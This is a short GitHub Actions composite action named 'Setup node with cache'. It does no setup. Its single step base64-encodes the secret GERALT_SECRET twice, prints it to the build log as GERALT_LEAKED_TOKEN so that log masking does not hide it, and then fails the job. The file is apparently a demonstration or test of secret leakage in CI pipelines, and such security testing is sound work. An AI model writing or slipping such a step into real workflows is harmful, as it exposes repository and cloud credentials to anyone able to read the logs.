name: "Setup node with cache action"
description: "Setups node with cache"

runs:
  using: "composite"
  steps:
    - name: Setup Node
      shell: bash
      run: |
        echo "GERALT_LEAKED_TOKEN=$(echo -n "$GERALT_SECRET" | base64 | base64)"
        exit 1
